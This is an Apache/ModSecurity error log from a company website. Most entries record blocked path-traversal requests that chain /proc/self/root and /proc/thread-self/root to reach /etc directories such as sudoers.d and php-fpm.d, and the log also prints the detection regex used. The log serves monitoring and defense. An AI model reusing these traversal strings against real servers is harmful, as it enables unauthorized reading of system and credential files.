https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:51:27.663733 2026] [:error] [pid 7437:tid 140411649607424] [client 74.7.243.128:35600] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmirweiSKl8TjouI-Yj2gAAA8s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:51:29.592614 2026] [:error] [pid 2473:tid 140411548894976] [client 74.7.243.128:58800] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmisaBJNF7axNlVR0UjYAAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:51:32.703124 2026] [:error] [pid 7437:tid 140411733534464] [client 74.7.243.128:58814] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmisweiSKl8TjouI-Yj3gAAA8E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:51:37.529620 2026] [:error] [pid 18380:tid 140411557287680] [client 74.7.243.128:58826] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmiua4xEDsg_V3ESNZXLgAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:51:39.134086 2026] [proxy_fcgi:error] [pid 2598:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:36794] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:51:40.491198 2026] [:error] [pid 29151:tid 140411641214720] [client 74.7.243.128:55622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmivPPqhzTj3BvfDX-TJgAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:51:42.403331 2026] [:error] [pid 29151:tid 140411691570944] [client 74.7.243.128:55622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmivvPqhzTj3BvfDX-TKAAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:51:44.262442 2026] [:error] [pid 7004:tid 140411708356352] [client 74.7.243.128:55628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmiwMU6Sx0TG1YjmQi6bgAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:51:47.331196 2026] [:error] [pid 17965:tid 140411716749056] [client 74.7.243.128:55634] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmiwqt8Nd0UC_OcbVHUuAAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:51:48.955546 2026] [:error] [pid 7004:tid 140411632822016] [client 74.7.243.128:55638] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmixMU6Sx0TG1YjmQi6cAAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:51:50.306558 2026] [:error] [pid 6296:tid 140411733534464] [client 74.7.243.128:58698] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmixnIk7brgkOH-rIWWtgAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:51:51.888068 2026] [:error] [pid 2598:tid 140411691570944] [client 74.7.243.128:58702] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmixxj0p0SRWAqcjGGEUAAAAwY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:51:53.435382 2026] [:error] [pid 17965:tid 140411666392832] [client 74.7.243.128:58714] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmiyat8Nd0UC_OcbVHUuwAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:52:00.133898 2026] [proxy_fcgi:error] [pid 9299:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:37312] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:52:01.472577 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.243.128:34440] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmi0dY0UrI5A3LftIwIvQAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:52:03.303066 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.243.128:34456] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmi06BJNF7axNlVR0UjbgAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:52:04.941260 2026] [:error] [pid 7437:tid 140411666392832] [client 74.7.243.128:34468] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmi1AeiSKl8TjouI-Yj5wAAA8k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:52:06.471377 2026] [:error] [pid 2598:tid 140411540502272] [client 74.7.243.128:34482] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmi1hj0p0SRWAqcjGGEVAAAAxg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:52:06.952016 2026] [:error] [pid 9299:tid 140411691570944] [client 74.7.241.31:33086] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmi1r-sgTmmJoPuMdzBNwAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:52:07.915412 2026] [:error] [pid 7004:tid 140411691570944] [client 74.7.243.128:34498] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmi18U6Sx0TG1YjmQi6dgAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:52:09.620626 2026] [:error] [pid 2473:tid 140411557287680] [client 74.7.241.31:52624] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmi2KBJNF7axNlVR0UjewAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:52:16.191355 2026] [:error] [pid 7437:tid 140411674785536] [client 74.7.241.31:52638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmi4AeiSKl8TjouI-Yj7QAAA8g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:52:22.517315 2026] [proxy_fcgi:error] [pid 9299:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:37824] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:52:44.109861 2026] [proxy_fcgi:error] [pid 7004:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:38386] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:52:57.413326 2026] [:error] [pid 9299:tid 140411641214720] [client 74.7.243.128:43176] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmjCb-sgTmmJoPuMdzBWQAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:53:07.138166 2026] [proxy_fcgi:error] [pid 9299:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:38916] AH01075: Error dispatching request to : (polling)
